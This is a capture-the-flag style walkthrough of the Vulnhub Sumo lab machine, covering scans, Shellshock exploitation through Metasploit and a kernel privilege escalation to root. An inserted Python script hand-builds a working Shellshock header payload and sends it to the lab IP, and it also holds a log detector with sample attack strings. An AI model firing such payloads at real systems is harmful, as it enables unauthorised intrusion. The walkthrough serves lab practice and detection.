Sumo Walkthrough

Introduction

Today, we're going to be doing a boot2root walkthrough of the Sumo machine, created by the SunCSR Team and hosted on Vulnhub (https://www.vulnhub.com/entry/sumo-1,480/). We'll be using two virtual machines for this walkthrough: our attacking Kali Linux machine and the target Sumo machine.

Locating the Target

First, let's locate the target machine on the network using netdiscover:


It looks like 10.0.2.7 is our target.

Scanning and Enumeration

Let's start our scans with a quick Nmap scan to see which TCP ports are open.




Just a couple of open ports. We'll run the same sort of quick scan for UDP ports as well.



Nothing there. Let's do an in-depth Nmap scan (version detection and OS fingerprinting) of the open TCP ports we found.
We can glean a few details from this scan: the web server is Apache 2.2.22, the SSH service is OpenSSH 5.9p1, and the OS is probably Linux, most likely Ubuntu. Those two package versions are the ones shipped with Ubuntu 12.04 LTS, which lines up with the later findings.

Next, we'll run a Nikto scan against the target's web server:



The web server appears to be vulnerable to Shellshock, so that's something we'll look into once our scans are done.

Finally, we'll use Nessus to scan for vulnerabilities:







Finding a Way In

From the look of the Nessus results, we're confident that Shellshock is the thing to look into as a way to exploit the target, with the outdated Ubuntu release the target is running as a second lead. An unsupported OS version usually points toward local privilege escalation exploits rather than a remote way in, so we'll investigate that later, once we have a shell. We take note of the CVE numbers for Shellshock (CVE-2014-6271 and CVE-2014-6278) and plug them into Metasploit's search to look for something we can use:


We recall that our Nikto scan revealed the path to the CGI directory on the web server, so we'll look at the 5th entry on this list, then check which options the module needs:


It looks like we'll need to supply this module with the target's IP address and the path to a CGI script in order to run it. After setting those options and choosing a payload, the settings look like this:


We run the exploit and a Meterpreter session opens up for us:
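The Metasploit module above automates what is, at bottom, a single crafted HTTP header. As an added example (not part of the original post, and not the module's own code), the following Python script builds that probe by hand, decides from the response whether the CGI script is exposed, and, for the defensive side, flags the same pattern in Apache access logs. The target IP is the one found with netdiscover above; the CGI path, the marker string and the log lines are constructed placeholders, since the post does not print the path Nikto reported.

```python
"""Manual Shellshock (CVE-2014-6271) probe against a CGI script, plus a
detector for the same pattern in Apache access logs.

Added example; the CGI path, marker and log lines are constructed
placeholders, not values taken from the Sumo machine.
"""
import re
import socket

TARGET_HOST = "10.0.2.7"         # the target located with netdiscover
CGI_PATH = "/cgi-bin/test.cgi"   # hypothetical: the post does not print the path Nikto found
MARKER = "shellshock-probe-ok"   # arbitrary string we expect to see echoed back


def build_payload(command):
    """Return a header value that triggers Shellshock.

    Bash imports exported functions from any environment variable whose value
    starts with '() {'. Unpatched versions keep parsing after the closing '}'
    and execute whatever follows as a command the moment bash starts.
    Apache's mod_cgi copies request headers into the CGI environment
    (User-Agent becomes HTTP_USER_AGENT), so a header is enough to reach it.
    """
    return "() { :; }; " + command


def build_request(host, path, command):
    """Build a raw HTTP/1.1 GET carrying the payload in the User-Agent header."""
    lines = [
        "GET %s HTTP/1.1" % path,
        "Host: %s" % host,
        "User-Agent: %s" % build_payload(command),
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def is_vulnerable(response):
    """True if the marker we injected came back in the response.

    The injected command runs before the CGI script prints its own headers,
    so the probe starts with two echos: the blank lines they produce end the
    CGI header block and let the marker land in the response body instead
    of making Apache reject the output as a malformed header.
    """
    return MARKER.encode() in response


def probe(host=TARGET_HOST, path=CGI_PATH, port=80, timeout=5.0):
    """Send the probe over a socket and report whether the script is exposed."""
    request = build_request(host, path, "echo; echo; echo %s" % MARKER)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return is_vulnerable(b"".join(chunks))


# --- defensive side: spot the same payload in Apache combined-format logs ---

LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")   # the function-definition prefix

# Constructed sample, not the target's real log.
SAMPLE_LOG = """\
10.0.2.15 - - [10/Jun/2020:12:00:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 25 "-" "() { :; }; echo; echo; echo shellshock-probe-ok"
10.0.2.15 - - [10/Jun/2020:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Jun/2020:12:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; /bin/bash -c 'id'" "curl/7.68.0"
"""


def find_shellshock_probes(log_text):
    """Return one record per request whose User-Agent or Referer carries the
    prefix (any header reaches the CGI environment, so both are checked)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "src": m.group("src"),
                    "request": m.group("req"),
                    "status": m.group("status"),
                    "field": field,
                    "value": m.group(field),
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print("%(src)s %(request)s -> %(status)s via %(field)s: %(value)s" % hit)
    # Live probe (needs network reachability to the target):
    # print("vulnerable" if probe() else "not vulnerable")
```

A 200 with the marker in the body confirms the script is reachable and bash is unpatched; a 500 without it usually means the script exists but bash has been patched (or the script never invokes bash at all). On the detection side, note that the third sample line shows the payload in the Referer header and was logged as a 500: the probe failed, but it is still an attack attempt worth alerting on.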


Privilege Escalation

Now that we have a shell on the target, we can look for a privilege escalation exploit matching the outdated OS version (Ubuntu 12.04). Before picking one, it's worth confirming the exact release and kernel version on the box against what a candidate exploit expects, since kernel exploits are version-specific and a mismatch can crash the target.


This one fits, so we download the exploit source, then upload the file to the target using Meterpreter's upload command:









We then drop from Meterpreter into a system shell, upgrade it to a proper TTY with a Python one-liner, and change to the /tmp/ directory where our exploit code is.


Now we compile the exploit with GCC (the target has a compiler installed, which is not something to count on) and execute it.


Success! We have elevated ourselves to root. All that's left is to find the target's flag, which the documentation for this machine says is in the /root/ directory.


And that's it.

Summary

Our initial scans presented two potentially exploitable issues: the outdated OS version (Ubuntu 12.04) and the target's vulnerability to Shellshock. Using the path to the web server's cgi directory discovered by Nikto, we were able to use a Metasploit module to gain a remote shell on the system, which let us upload a local exploit for the outdated OS to the target and gain root access.